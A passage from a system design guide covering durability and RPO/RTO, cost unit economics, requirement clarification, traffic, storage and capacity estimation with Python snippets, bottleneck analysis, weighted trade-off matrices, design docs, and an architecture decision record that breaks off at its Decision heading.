4. fsync'd + replicated to 1 peer in the same AZ -> lost on AZ failure
5. Replicated across 3 AZs -> survives a data centre failure
6. Replicated across regions -> survives a regional disaster
Each step down adds latency and cost. Pick the level per data class:
payment records at 5-6, analytics events at 2-3.
Two acronyms make the target concrete:
- RPO (Recovery Point Objective) — how much data you can afford to lose, measured in time. RPO = 5 minutes means backups/replication must be at most five minutes behind.
- RTO (Recovery Time Objective) — how long recovery may take.
# Durability is a write-path configuration decision, not a vague hope.
# Quorum settings on a replicated store with replication factor N = 3:
N, W, R = 3, 2, 2
print("strongly consistent reads:", W + R > N) # True: 2+2 > 3
# W=2 -> the write is acknowledged only after 2 replicas have it.
# Losing one node cannot lose an acknowledged write.
# W=1 -> lower latency, but an acknowledged write can vanish with one node.
# Estimating annual data-loss risk with independent failures (illustrative):
p_node_loss_per_year = 0.02 # 2% chance per node
print(round(p_node_loss_per_year ** 3 * 100, 6)) # 0.0008% for all three
# The number is only as good as the independence assumption: same rack, same
# power, same bad deploy, and the copies fail together.
Replication is not backup. Replication faithfully copies your mistakes — a
DELETE without a WHERE clause propagates to every replica in milliseconds.
Point-in-time backups, immutability, and delayed replicas protect against
logical corruption; replicas protect against hardware loss.
Key Takeaways
- Durability means an acknowledged write survives failures; it is set by copy count and acknowledgement point.
- RPO (data loss tolerance) and RTO (recovery time) turn durability into testable numbers.
- Quorum settings (W + R > N) tie durability to consistency and latency.
- Replication is not backup — it replicates logical corruption too.
🧪 Practice
- For each data class, propose an RPO and RTO: payment ledger, user avatars, clickstream analytics, session tokens.
- With N = 5 replicas, list the (W, R) pairs that give strongly consistent reads, and rank them by write latency.
- Interview: A team says "we have three replicas, so we don't need backups". What do you say? (Hint: think about what a replica does with a bad migration script.)
Cost Efficiency
Cost is a first-class quality attribute, not an afterthought. Every design choice in this book — an extra replica, a cache tier, a second region, stronger consistency — has a price, and a design that meets every technical target while costing more than the product earns is a failed design.
The key move is to stop thinking in monthly totals and start thinking in unit economics: cost per request, per active user, per gigabyte stored, per tenant. Unit costs are what tell you whether growth improves or destroys your margins, and they make architectural options directly comparable.
# Unit economics for a hypothetical API tier
monthly_requests = 500_000_000
compute_cost = 4_200 # autoscaled application servers
database_cost = 3_100 # primary + 2 replicas + storage
cache_cost = 700
egress_cost = 2_400 # data transfer out is often the surprise
observability_cost = 900 # logs and metrics scale with traffic too
total = compute_cost + database_cost + cache_cost + egress_cost + observability_cost
cost_per_million = total / (monthly_requests / 1_000_000)
print(total, round(cost_per_million, 2)) # 11300 22.6 -> $22.60 per 1M requests
# Now the design question becomes concrete: a cache tier that costs $700/month
# and removes 60% of database reads is worth it only if it defers more than
# $700/month of database scaling — and you can compute that.
| Cost driver | Typical surprise | Common lever |
|---|---|---|
| Compute | Idle over-provisioned capacity | Autoscaling, right-sizing, spot |
| Storage | Old data never deleted | Tiering to cold storage, retention |
| Network egress | Cross-AZ and internet transfer dominates the bill | CDN, compression, AZ-local routing |
| Managed services | Per-request pricing at scale | Batch, cache, or self-host at scale |
| Observability | Log volume grows with traffic and with debugging habits | Sampling, cardinality limits |
| Engineering time | The largest and least tracked cost of all | Simplicity, managed services early |
Note the last row. Engineering salaries usually dwarf infrastructure bills for small teams, which is why "self-host it to save $400/month" is often a bad trade, and why simplicity is a cost optimization.
Cost also trades directly against the other attributes: going from 99.9% to 99.99% availability typically means multi-AZ or multi-region redundancy and can double infrastructure cost for 47 fewer minutes of downtime per year. Whether that is worth it is a business question with a numeric answer.
Key Takeaways
- Measure unit costs (per request, per user, per GB), not just monthly totals.
- Network egress, storage growth, and observability are the usual hidden drivers.
- Engineering time is a real cost — simplicity is a cost optimization.
- Every extra nine of availability has a price; state it and let the business decide.
🧪 Practice
- Compute the cost per 1,000 requests for a service costing $8,000/month at 200M requests/month. What if traffic halves but the fleet does not shrink?
- List three architectural changes that reduce egress cost, and the trade-off each brings.
- Interview: The CFO asks why the bill doubled after adding a second region. How do you justify it? (Hint: convert availability into downtime minutes, then into revenue or contractual penalties.)
<a id="13-requirement-gathering-and-estimation"></a>
1.3 Requirement Gathering and Estimation
Every real design starts from an underspecified prompt. This subchapter is the bridge from "design Instagram" to a set of numbers — QPS, bytes, machines — that make architectural choices decidable rather than opinionated.
Clarifying Ambiguous Requirements
"Design a chat app" is not a specification; it is a topic. The gap between the prompt and a designable problem is filled by questions, and asking them well is a skill that is graded explicitly in interviews and rewarded implicitly at work. Designing before clarifying is how teams build the wrong system efficiently.
The trap to avoid is a scattershot list of trivia ("does it support dark mode?"). Good clarifying questions are the ones whose answers change the architecture. Ask in a funnel: scope first, then scale, then quality, then constraints.
THE CLARIFICATION FUNNEL
1. Scope Who are the users? What are the top 3 things they do?
What is explicitly out of scope for v1?
2. Scale How many users (total / daily active)? How much data?
Read-heavy or write-heavy? What is the peak-to-average ratio?
3. Quality Latency target? Availability target? Consistency needs?
Is stale data acceptable, and for how long?
4. Context Greenfield or integrating with existing systems?
Team size, deadline, budget, regulatory constraints?
Global or single-region? Mobile clients on poor networks?
A test for whether a question is worth asking: can you name two different architectures that the two possible answers would lead to? If not, assume a reasonable default, state the assumption, and move on.
| Question | Why it changes the design |
|---|---|
| "Read-heavy or write-heavy?" | Decides caching, replication, and index strategy |
| "Must messages be ordered per conversation?" | Decides partitioning key and sequencing mechanism |
| "Is 30-second staleness acceptable?" | Decides strong vs. eventual consistency and cost |
| "Global users or one region?" | Decides replication topology and latency budget |
| "Do we need message search?" | Adds or removes an entire indexing subsystem |
| "Does it support dark mode?" | Changes nothing — do not ask this |
# A compact intake structure worth reusing at the start of any design.
REQUIREMENTS = {
"scope": {"in": ["1:1 chat", "group chat <=100", "online presence"],
"out": ["voice/video", "file sharing", "message search"]},
"scale": {"dau": 50_000_000, "msgs_per_user_per_day": 40,
"peak_factor": 3, "read_write_ratio": 5},
"quality": {"p99_send_ms": 300, "availability": 0.9995,
"ordering": "per-conversation", "staleness_ok_s": 0},
"context": {"regions": ["us", "eu"], "mobile_first": True,
"team": 6, "deadline_months": 4},
}
# Everything downstream — QPS, storage, topology — derives from this dict.
Key Takeaways
- Clarify before designing; the prompt is never the specification.
- Ask questions in a funnel: scope, then scale, then quality, then context.
- A question is worth asking only if different answers lead to different architectures.
- When a question is not worth the time, state a default assumption aloud and proceed.
🧪 Practice
- Write eight clarifying questions for "design a file storage service like Dropbox", grouped by the four funnel stages.
- For three of them, describe the two different architectures the two possible answers would produce.
- Interview: The interviewer answers every clarifying question with "you decide". What do you do? (Hint: they are testing whether you can pick defensible defaults and say them out loud.)
Defining System Scope
Scope is the boundary around what you are designing. Drawing it explicitly does two things: it prevents the design from sprawling into every adjacent problem, and it makes the interfaces to the outside world visible — which is where most integration risk lives.
The classic tool is a context diagram: your system as one box in the middle, every external actor and system around it, and a labelled arrow for each interaction. If you cannot draw it, you do not yet know what you are building.
CONTEXT DIAGRAM — "Ride matching service" (the box we are designing)
[Rider app] [Driver app]
| request ride, poll status | location updates,
v v accept/decline
+--------------------------------------------------------------+
| RIDE MATCHING SERVICE |
| (in scope: request intake, driver index, matching, state) |
+--------------------------------------------------------------+
| | | |
v v v v
[Payments svc] [Maps/ETA API] [Notification svc] [Analytics sink]
(external) (3rd party) (internal) (internal)
Out of scope: pricing model, driver onboarding, fraud detection, payouts.
An explicit in/out table is worth more than paragraphs of prose:
| In scope | Out of scope (v1) |
|---|---|
| Accepting and storing ride requests | Surge pricing computation |
| Maintaining an index of nearby drivers | Driver background checks and onboarding |
| Matching a request to exactly one driver | Payment capture and driver payouts |
| Publishing trip state changes | Fraud detection |
| Exposing trip status to clients | Long-term analytics and reporting |
Two habits keep scope honest. First, write the out of scope column first — it is easier and it surfaces disagreement immediately. Second, for every external box, name the contract: protocol, expected latency, failure behaviour, and what your system does when that dependency is down. Half of all incident postmortems trace to an unexamined arrow crossing the system boundary.
Key Takeaways
- Scope defines what you build and, just as importantly, what you do not.
- A context diagram makes every external dependency and its contract visible.
- Write the out-of-scope list explicitly — it prevents sprawl and surfaces disagreement early.
- For each boundary-crossing arrow, define the failure behaviour, not just the happy path.
🧪 Practice
- Draw a context diagram for an e-commerce checkout service, including at least four external systems.
- For each external system, write one sentence describing what your service does when it is unavailable.
- Interview: Mid-design, the interviewer adds "also support group ordering". How do you respond without discarding your design? (Hint: decide whether it is a new component, a change to an existing one, or a v2 item — and say which.)
Back-of-the-Envelope Calculations
Back-of-the-envelope (BOTE) estimation is the practice of getting to an answer that is right within an order of magnitude, in under a minute, using round numbers. Its purpose is not precision — it is decision-making. Whether a data set is 50 GB or 50 TB determines whether it fits in memory on one machine or needs a sharded cluster, and you can tell the difference without a spreadsheet.
The technique rests on three habits: round aggressively to one significant figure, keep units explicit at every step, and memorize a handful of anchor numbers so you never have to look them up mid-conversation.
ANCHORS WORTH MEMORIZING
Time Powers of two
1 day = 86,400 s ~ 10^5 s 2^10 ~ 1 thousand (KB)
1 month ~ 2.6M s ~ 2.5 x 10^6 2^20 ~ 1 million (MB)
1 year ~ 31.5M s ~ 3 x 10^7 2^30 ~ 1 billion (GB)
2^40 ~ 1 trillion (TB)
Sizes (typical)
UUID 16 B | timestamp 8 B | short text field ~50 B
Tweet-sized record ~ 300 B | thumbnail ~ 20 KB | photo ~ 2 MB
1 minute of 1080p video ~ 50 MB
| Operation | Order of magnitude | Notes |
|---|---|---|
| L1 cache reference | ~1 ns | Baseline |
| Main memory reference | ~100 ns | 100x slower than L1 |
| Read 1 MB sequentially from memory | ~3 us | |
| SSD random read | ~15-100 us | NVMe at the fast end |
| Round trip inside one data centre | ~0.5 ms | Same-region service call |
| Read 1 MB sequentially from SSD | ~0.5 ms | |
| HDD seek | ~10 ms | Why random HDD I/O is fatal |
| Round trip across a continent | ~50-80 ms | Physics, not software |
| Round trip Europe to Australia | ~150-300 ms | Physics, not software |
The most valuable lesson in that table is the gap: memory is roughly 100,000 times faster than a cross-continent round trip. Almost every performance design decision is about moving work up that table.
# BOTE worked example: "will this dataset fit in RAM?"
users = 200_000_000
bytes_per_user = 500 # rounded generously
raw = users * bytes_per_user # 100_000_000_000 bytes
print(raw / 1e9, "GB") # 100.0 GB
# Overhead is never zero: indexes, pointers, fragmentation. Assume 2x.
print(raw * 2 / 1e9, "GB") # 200.0 GB
# Verdict: too big for a comfortable single cache node (typical 64-256 GB),
# fine for a small sharded cluster. That is the decision the estimate exists
# to make — no further precision is useful.
Sanity-check every result against something you know. If a calculation says a photo service needs 4 PB per day, ask whether that is plausible for the user count you assumed; an order-of-magnitude slip in an intermediate step is the usual culprit.
Key Takeaways
- BOTE aims for the right order of magnitude, fast — precision is not the goal.
- Round to one significant figure, carry units explicitly, and use anchors (10^5 s/day, 2^30 ~ 1 billion).
- Memory-to-network latency spans about five orders of magnitude; most optimization is moving work up that ladder.
- Always sanity-check the final number against something you already know.
🧪 Practice
- Estimate the storage needed for one year of chat messages: 50M DAU, 40 messages/day, ~200 bytes each, replication factor 3.
- Estimate how long it takes to transfer 10 TB over a 1 Gbps link, then over a 10 Gbps link. Compare with shipping physical disks.
- Interview: Estimate the number of servers needed to serve 1M concurrent WebSocket connections. (Hint: start from connections per server and memory per connection, and remember file descriptor limits.)
Traffic and QPS Estimation
QPS (queries per second) is the number that sizes almost everything downstream: server count, connection pools, cache capacity, database throughput. Getting it approximately right early prevents both under-provisioning (an outage) and over-provisioning (a wasted budget).
The chain is always the same: from users, to actions per user per day, to requests per day, to average QPS, to peak QPS. The last step matters most — systems must be sized for the peak, not the average, and real traffic is spiky: daily cycles, lunchtime spikes, marketing pushes, and time zones stack up. A peak-to-average factor of 2x to 5x is typical; flash-sale or live-event systems can see 20x or more.
THE ESTIMATION CHAIN
DAU x actions/user/day = actions/day
actions/day / 86,400 = average QPS
average QPS x peak factor = peak QPS <- size for this
peak QPS split by read/write ratio -> read QPS and write QPS
DAU = 100_000_000
actions_per_user = 10 # posts, likes, reads: everything hitting the API
peak_factor = 3 # measured if possible; assumed otherwise
read_write_ratio = 100 # 100 reads per write
requests_per_day = DAU * actions_per_user # 1_000_000_000
avg_qps = requests_per_day / 86_400 # ~11,574
peak_qps = avg_qps * peak_factor # ~34,722
write_qps = peak_qps / (read_write_ratio + 1) # ~344
read_qps = peak_qps - write_qps # ~34,378
for name, value in [("avg", avg_qps), ("peak", peak_qps),
("peak read", read_qps), ("peak write", write_qps)]:
print(f"{name:11} {value:,.0f} QPS")
# avg 11,574 QPS
# peak 34,722 QPS
# peak read 34,378 QPS
# peak write 344 QPS
Read those results the way a designer would. ~344 writes/second is comfortable for a single well-tuned relational primary. ~34,000 reads/second is not — that number is what justifies a cache tier and read replicas. The estimate did not just produce a figure; it produced an architecture.
| Trap | Correction |
|---|---|
| Sizing for average QPS | Size for peak; averages hide the outage |
| Ignoring fan-out | One user action may cause 10 internal service calls |
| Assuming a uniform day | Model time zones and daily peaks explicitly |
| Forgetting background load | Cron jobs, re-indexing, and backfills share the fleet |
| Counting only human traffic | Bots, scrapers, retries, and health checks add up |
Fan-out deserves special attention: if one page view triggers 12 internal calls, your internal QPS is 12x the external QPS, and internal services must be sized on the larger number.
Key Takeaways
- Derive QPS as DAU x actions/day / 86,400, then multiply by a peak factor.
- Always size for peak QPS, and split it by the read/write ratio.
- Internal QPS is external QPS times fan-out — size internal services on it.
- The QPS split is what justifies (or rules out) caches, replicas, and sharding.
🧪 Practice
- Compute average and peak QPS for 5M DAU, 20 actions/day, peak factor 4.
- Recompute assuming each user action fans out to 8 internal service calls, and state which component you would worry about first.
- Interview: Your service sees 2x traffic every day at 20:00 local time across three continents. How do you provision? (Hint: consider whether the peaks overlap, and what autoscaling can and cannot react to in time.)
Storage and Bandwidth Estimation
Storage estimation answers "how much data will exist, and for how long?". Bandwidth estimation answers "how many bytes per second cross which boundary?". Both matter because they set costs and because they frequently break the design before CPU ever does — network egress is often the largest line on a cloud bill, and unbounded storage growth is the most common source of nasty surprises in year two.
The method mirrors QPS estimation: bytes per record, times records per day, times retention, times replication.
STORAGE CHAIN BANDWIDTH CHAIN
bytes/record requests/second (peak)
x records/day x bytes/response
= bytes/day = bytes/second
x retention (days) x 8
= logical bytes = bits/second -> compare to NIC/link
x replication factor
x (1 + index/overhead)
= provisioned bytes
# Storage: one year of a Twitter-like write load
writes_per_day = 1_000_000_000 # 1B new records/day
bytes_per_record = 300 # text + ids + timestamps, rounded up
replication = 3
overhead = 1.3 # indexes, metadata, fragmentation
bytes_per_day = writes_per_day * bytes_per_record # 3.0e11
per_year_raw = bytes_per_day * 365 # 1.095e14
provisioned = per_year_raw * replication * overhead
print(round(bytes_per_day / 1e12, 2), "TB/day") # 0.3 TB/day
print(round(per_year_raw / 1e12), "TB/year logical") # 110 TB/year
print(round(provisioned / 1e12), "TB/year provisioned") # 427 TB/year
# Bandwidth: serving the read path
peak_read_qps = 34_000
bytes_per_resp = 2_000 # 2 KB JSON response
egress_bytes_s = peak_read_qps * bytes_per_resp # 68 MB/s
print(round(egress_bytes_s / 1e6, 1), "MB/s",
round(egress_bytes_s * 8 / 1e9, 2), "Gbps") # 68.0 MB/s 0.54 Gbps
Half a gigabit per second of egress is a real cost line and a strong argument for a CDN and for compression on large responses. And 427 TB/year of provisioned storage says plainly that a retention policy or a tiering strategy is not optional.
| Content type | Rough size | Design implication |
|---|---|---|
| Text record/row | 100 B - 1 KB | Cheap; billions fit in a sharded database |
| Thumbnail | ~20 KB | Cache aggressively at the edge |
| Photo (compressed) | 1 - 5 MB | Object storage + CDN, never in the database |
| 1 min 1080p video | ~50 MB | Object storage, chunked, adaptive bitrate |
| Log line | 200 B - 2 KB | Volume explodes with traffic; sample it |
Two rules of thumb worth internalizing: store large binary objects in object storage and keep only a pointer in your database; and set a retention policy for every data class on day one, because deleting data later is politically and technically harder than never keeping it.
Key Takeaways
- Storage = bytes/record x records/day x retention x replication x overhead.
- Bandwidth = peak QPS x bytes/response; convert to bits when comparing with link capacity.
- Egress and unbounded growth are the two costs teams most often miss.
- Blobs go to object storage behind a CDN; databases hold pointers.
🧪 Practice
- Estimate one year of provisioned storage for a photo service: 10M photos/day, 2 MB each plus three thumbnails, replication factor 3.
- Estimate peak egress bandwidth for a video service streaming to 100,000 concurrent viewers at 5 Mbps, and say what that implies about a CDN.
- Interview: Your database grows 1 TB per week and queries are slowing down. What are your options? (Hint: some options reduce data, some redistribute it, some change how it is accessed — name at least one of each.)
Capacity Planning Basics
Capacity planning converts estimates into a concrete fleet: how many servers, threads, connections, and shards, with enough headroom to survive both a spike and a failure. Under-provision and you take an outage; over-provision and you burn money — and the target is not "enough for peak" but "enough for peak, minus a failed component, plus room to react".
Three ideas carry most of the weight.
Utilization targets. Never plan to run at 100%. Queueing theory says
latency rises roughly as 1 / (1 - utilization), so a resource at 90% is not
"a bit slower than 80%" — it is dramatically worse. Target 50-70% at peak for
latency-sensitive services.
Latency multiplier vs. utilization (M/M/1 intuition)
utilization 0.5 0.7 0.8 0.9 0.95 0.99
multiplier 2x 3.3x 5x 10x 20x 100x
| *
| *
| *
| *
| * *
+---------------------------------------------------> utilization
The knee is real. Capacity plans that ignore it produce latency incidents,
not cost savings.
N+1 and N+2 redundancy. Provision enough capacity that losing one instance (N+1) or one availability zone (N+2, or 3 AZs at 2/3 capacity each) does not push the survivors past their utilization target.
Little's Law for concurrency. Thread pools and connection pools are sized
from L = λ × W, not guessed.
peak_qps = 34_000
rps_per_server = 1_000 # measured under load test, not assumed
target_utilization = 0.6 # keep off the latency knee
azs = 3 # must survive losing one AZ
usable_per_server = rps_per_server * target_utilization # 600
servers_needed = peak_qps / usable_per_server # ~56.7 -> 57
# Survive one AZ loss: the remaining (azs - 1) must carry the full peak.
servers_total = -(-servers_needed // (azs - 1)) * azs # ceil then x AZs
print(int(servers_needed), int(servers_total)) # 56 87
# Concurrency per server via Little's Law
avg_latency_s = 0.050
in_flight = (peak_qps / servers_needed) * avg_latency_s
print(round(in_flight, 1), "concurrent requests per server") # 30.0
# -> thread/connection pool of ~30, plus headroom; a pool of 8 would queue,
# and a pool of 500 would thrash memory and context switches.
| Input to a capacity plan | Where it comes from |
|---|---|
| Peak QPS | Traffic estimation plus measured history |
| Per-server capacity | Load testing a single instance to its knee |
| Utilization target | Latency SLO and the queueing knee |
| Redundancy factor | Availability target and failure domains |
| Growth rate | Product forecast; plan 6-12 months ahead |
| Scaling lead time | How fast you can actually add capacity |
That last row is the one people forget. Autoscaling that takes four minutes to boot an instance cannot absorb a spike that arrives in thirty seconds — so either pre-warm capacity ahead of known events, or shed load gracefully with queues and rate limits (Chapter 6).
Key Takeaways
- Size for peak, at a utilization target well below saturation — latency explodes near 100%.
- Add redundancy so losing an instance or an AZ does not exceed the target.
- Use Little's Law to size thread and connection pools instead of guessing.
- Measure per-server capacity with a load test; account for scaling lead time.
🧪 Practice
- Plan the fleet for 12,000 peak QPS, 800 RPS/server measured, 60% utilization target, across two AZs surviving the loss of one.
- A service handles 3,000 RPS with 120 ms latency. Size its connection pool, and explain what happens if you set it to one tenth of that.
- Interview: Traffic triples during a 90-second flash sale. Autoscaling needs 4 minutes. What is your plan? (Hint: three families of answers — pre-provision, queue the work, or reject some of it deliberately.)
<a id="14-design-process-and-trade-offs"></a>
1.4 Design Process and Trade-offs
Requirements and numbers in hand, the remaining skill is process: a repeatable method for producing a design, finding its weak point, choosing between options with reasons, and recording those reasons so the system can keep evolving after you have moved on.
Structured Design Methodology
Design under pressure — an interview, a deadline, a room full of opinions — goes badly without a method. A structured approach guarantees that requirements precede architecture, that scale drives storage choice rather than fashion, and that you never run out of time before the interesting parts.
The method below is deliberately linear, but the loop back from step 6 is the real point: designs are refined, not produced in one pass.
THE SIX-STEP METHOD 45-min interview budget
1. Clarify requirements ~5 min
FRs, NFRs, out of scope, constraints, assumptions
2. Estimate scale ~5 min
DAU -> QPS -> storage -> bandwidth; note what it implies
3. Define the API and data model ~5-10 min
Endpoints/events; entities, keys, and access patterns
4. Draw the high-level design ~10-15 min
Client -> edge -> services -> stores; label every arrow
5. Deep dive on 1-2 components ~10 min
Usually the bottleneck from step 2 or the hardest FR
6. Identify bottlenecks, failures, and next steps ~5 min
Scale it 10x, kill a component, name the trade-offs
-> then loop: the deep dive usually invalidates part of step 4
Two rules make the method work in practice. Drive the data model from the access patterns, not from an entity-relationship diagram drawn in a vacuum: the queries you must serve determine the keys, and the keys determine whether the store can be partitioned. And narrate the "why" at each step — a design that is only a diagram is unreviewable, because reviewers cannot tell which lines are load-bearing.
STEP 3 EXAMPLE — driving the model from access patterns (URL shortener)
Access patterns Frequency Implied design
----------------------------------------------------------------------
resolve(short_id) ~34,000 QPS Point lookup by primary key ->
key-value store + cache
create(long_url) ~350 QPS Write path; needs unique id gen
list by owner ~5 QPS Secondary index or separate table
analytics by short_id batch Separate store; do not burden the
hot path with counters
Verdict: the dominant pattern is a single-key point read at high volume.
That single line rules out anything that requires a scan or a join.
| Step | Common mistake | Fix |
|---|---|---|
| 1 | Jumping to architecture in the first minute | Write FRs and NFRs down first |
| 2 | Skipping estimation | One minute of arithmetic decides the store |
| 3 | Modelling entities without access patterns | Enumerate queries and their frequencies |
| 4 | Unlabelled arrows | Label protocol, sync/async, and failure mode |
| 5 | Deep-diving a trivial component | Dive where scale or difficulty concentrates |
| 6 | Presenting the design as if it has no weaknesses | Name the bottleneck yourself, with numbers |
Key Takeaways
- Follow a fixed order: requirements, estimates, API and data model, HLD, deep dive, bottlenecks.
- Estimation belongs before architecture — the numbers pick the components.
- Derive the data model from access patterns and their frequencies.
- Narrate the reasoning; an unexplained diagram cannot be reviewed.
🧪 Practice
- Apply steps 1-3 to "design a pastebin service" and write the output for each step.
- Take an existing service you know and reverse-engineer its access patterns with rough frequencies. Does its storage choice match them?
- Interview: You have ten minutes left and have only finished step 4. What do you prioritize? (Hint: which remaining step most demonstrates senior judgment?)
Identifying Bottlenecks
A system's capacity is set by its most constrained resource, and everything else is slack. Optimizing anything other than the bottleneck produces no improvement at all — this is the core insight of the theory of constraints, and it is why "make the code faster" is so often wasted effort when the real limit is a single database primary.
Bottlenecks announce themselves through saturation: a resource near its limit, a queue that grows, latency climbing while throughput stays flat. The practical method is to go resource by resource. The USE method (Utilization, Saturation, Errors) applied to CPU, memory, disk, and network on every component finds most of them quickly.
FINDING THE BOTTLENECK BY SIGNATURE
Throughput flat, latency rising, CPU high -> CPU bound
Throughput flat, CPU low, queue depth growing -> downstream/lock bound
Latency spikes with GC pauses or swap activity -> memory bound
High iowait, disk queue length > 1 -> disk bound
Retransmits, bandwidth at link capacity -> network bound
All servers idle, one database at 100% CPU -> the classic: shared state
+------+ +------+ +---------+ +--------------+
|Client| --> | LB | --> | API x20 | --> | DB primary | <-- 98% CPU
+------+ +------+ +---------+ +--------------+
5% CPU ^
|
Adding API servers here changes nothing.
# Amdahl-style reasoning applied to a request's time budget.
budget_ms = {
"lb": 2,
"app_cpu": 15,
"db_query": 120, # 78% of the total
"cache": 3,
"serialize": 5,
}
total = sum(budget_ms.values()) # 145
print(total)
# Halving app CPU time saves 7.5 ms -> 5% better
# Halving the DB query saves 60 ms -> 41% better
for name, ms in budget_ms.items():
saved = ms / 2
print(f"{name:10} halving saves {saved:5.1f} ms ({saved/total:5.1%})")
# Optimize the biggest term first. Everything else is rounding error.
Bottlenecks also move. Fix the database and the next constraint appears — perhaps the connection pool, then the network, then serialization CPU. Expect to repeat the exercise rather than to finish it, and keep the measurement in place so you can tell where the constraint has migrated.
Key Takeaways
- System capacity equals the capacity of the most constrained resource.
- Optimizing a non-bottleneck yields nothing; find it before tuning anything.
- Look for saturation signatures: flat throughput, growing queues, rising latency.
- Bottlenecks move after each fix — measure continuously, not once.
🧪 Practice
- Given the time budget above, propose three concrete changes to the dominant term and estimate the gain from each.
- A service's CPU is at 30%, memory at 40%, and latency has tripled. List four candidate bottlenecks and the metric that would confirm each.
- Interview: You add servers and throughput does not improve. Walk through your diagnosis. (Hint: enumerate everything the servers share, from the database to the load balancer to a rate-limited third-party API.)
Trade-off Analysis
There are no free wins in system design. Every choice buys something and pays for it somewhere else: a cache buys read latency and pays in staleness and memory; a queue buys resilience and pays in complexity and eventual consistency; a second region buys availability and pays in cost and write latency. Senior judgment is not knowing "the right answer" — it is naming the currency each option is paid in.
Make trade-offs explicit with a small decision matrix. Weight the criteria by your ordered design goals from section 1.1, score the options, and let the result inform (not dictate) the decision. The number is less valuable than the conversation it forces.
| Criterion (weight) | Option A: Postgres | Option B: DynamoDB | Option C: Cassandra |
|---|---|---|---|
| Write scale (0.30) | 2 | 5 | 5 |
| Query flexibility (0.25) | 5 | 2 | 2 |
| Operational burden (0.20) | 4 | 5 | 2 |
| Team familiarity (0.15) | 5 | 3 | 2 |
| Cost at scale (0.10) | 4 | 2 | 4 |
| Weighted total | 3.80 | 3.65 | 3.10 |
weights = {"write_scale": .30, "query_flex": .25, "ops": .20,
"familiarity": .15, "cost": .10}
options = {
"postgres": {"write_scale": 2, "query_flex": 5, "ops": 4, "familiarity": 5, "cost": 4},
"dynamodb": {"write_scale": 5, "query_flex": 2, "ops": 5, "familiarity": 3, "cost": 2},
"cassandra": {"write_scale": 5, "query_flex": 2, "ops": 2, "familiarity": 2, "cost": 4},
}
for name, scores in options.items():
total = sum(scores[k] * w for k, w in weights.items())
print(f"{name:10} {total:.2f}")
# postgres 3.80 | dynamodb 3.65 | cassandra 3.10
#
# Postgres and DynamoDB are within noise of each other: the matrix says the
# decision hinges on whether write scale or query flexibility is the real
# constraint — which is a requirements question, not a database question.
Recurring trade-off axes worth having at your fingertips:
| Axis | You gain | You pay |
|---|---|---|
| Consistency vs. availability | Correct reads under partition | Rejected requests, latency |
| Latency vs. durability | Fast acknowledgements | Risk of losing recent writes |
| Normalization vs. denormalization | Write simplicity, no anomalies | Slower reads, more joins |
| Caching vs. freshness | Read latency and cost | Staleness, invalidation bugs |
| Synchronous vs. asynchronous | Simple reasoning, immediate result | Coupling, cascading failures |
| Monolith vs. microservices | Independent scaling and deploys | Network failures, ops burden |
| Build vs. buy | Control and fit | Engineering time and upkeep |
Two guardrails. First, prefer the simplest design that meets the stated NFRs — complexity added "for scale we might need" is a real cost paid today for a speculative benefit. Second, distinguish reversible from irreversible choices: spend your analysis budget on the irreversible ones.
Key Takeaways
- Every design choice has a currency it is paid in; name it explicitly.
- Use a weighted matrix tied to your ordered design goals to structure the comparison.
- Close scores are a signal that the decision depends on an unresolved requirement.
- Favour the simplest option that meets the NFRs; reserve deep analysis for irreversible decisions.
🧪 Practice
- Build a weighted matrix comparing REST and gRPC for an internal service-to-service API, with weights you can justify.
- For each axis in the table above, give a real system where the trade-off was resolved in each direction, and why.
- Interview: "Would you use SQL or NoSQL here?" How do you answer well? (Hint: the strong answer starts with an access pattern, not a preference.)
Documenting Design Decisions
A design that lives only in a diagram and in one engineer's head decays fast. Six months later nobody remembers why the queue is there, so someone removes it and rediscovers the reason during an incident. Documentation is not bureaucracy; it is how a system stays intelligible longer than the tenure of the people who built it.
The two artifacts that carry the load are the design document (a proposal, written before building, to align people and surface objections while changes are cheap) and the architecture decision record (a short, immutable note recording one decision and its reasoning — covered in the next topic).
A design doc worth writing follows a predictable shape:
DESIGN DOC TEMPLATE
1. Title, author, date, status draft | in review | approved | superseded
2. Context and problem what is broken or needed, with evidence
3. Goals / Non-goals ordered; non-goals prevent scope creep
4. Requirements FRs and measurable NFRs
5. Proposed design diagram + data model + key flows
6. Alternatives considered each with why it was rejected
7. Trade-offs and risks what this design is bad at
8. Migration / rollout plan including how to roll back
9. Operational impact monitoring, alerts, on-call, cost
10. Open questions the honest list
Sections 6 and 7 are where the value concentrates. A document that presents one option with no alternatives and no acknowledged weaknesses is a sales pitch, and reviewers will treat it as one.
<!-- Excerpt: the two sections most often written badly -->
## Alternatives considered
**A. Synchronous write to both stores.** Rejected: couples checkout
availability to the analytics store (0.9995 x 0.999 = 0.9985 -> misses the
99.95% NFR) and adds ~40 ms to p99 checkout latency.
**B. Nightly batch export.** Rejected: 24-hour freshness violates the
"dashboard within 5 minutes" requirement (NFR-4).
**C. CDC from the transaction log (chosen).** Meets freshness with ~30 s lag,
keeps checkout decoupled; costs an extra pipeline to operate.
## Trade-offs and risks
- Analytics data is eventually consistent; the dashboard may briefly disagree
with the ledger. Accepted: the ledger remains the source of truth.
- New operational surface: a CDC pipeline whose lag must be alerted on.
- If the pipeline is down > 6 h, replay requires log retention >= 6 h.
Write the doc before implementation, keep it short enough that people actually read it (two to five pages), and mark it superseded rather than deleting it when it is replaced — the trail of superseded documents is the system's intellectual history.
Key Takeaways
- Documentation preserves reasoning after the authors and the context are gone.
- A design doc states context, goals, requirements, design, alternatives, trade-offs, and rollout.
- Alternatives-considered and known-weaknesses are the highest-value sections.
- Write it before building; supersede rather than delete.
🧪 Practice
- Write a one-page design doc for adding full-text search to an existing application, including at least two rejected alternatives.
- Take a system you built and write its "trade-offs and risks" section honestly.
- Interview: How do you convince a team that resists writing design docs? (Hint: tie it to a cost they already feel, such as review time or repeated incidents.)
Architecture Decision Records (ADRs)
A design doc describes a whole proposal; an ADR records exactly one decision, in one page, immutably. The distinction matters because decisions have a much longer half-life than proposals: teams need to answer "why is it like this?" far more often than "what did we plan to build?".
The defining property of an ADR is immutability. You never edit an approved ADR to reflect a new decision — you write a new ADR that supersedes it. The result is an append-only log of the architecture's reasoning, in chronological order, that a new engineer can read front to back.
# ADR-014: Use Kafka for order event distribution
- **Status:** Accepted <!-- Proposed | Accepted | Deprecated | Superseded by ADR-021 -->
- **Date:** 2026-03-11
- **Deciders:** Platform team
- **Related:** ADR-009 (service boundaries), supersedes ADR-004
## Context
Six services need order state changes. Today the order service calls each of
them synchronously, so its availability is the product of seven services
(0.999^7 = 99.3%, below the 99.9% NFR), and adding a consumer requires
changing the order service.
## Decision
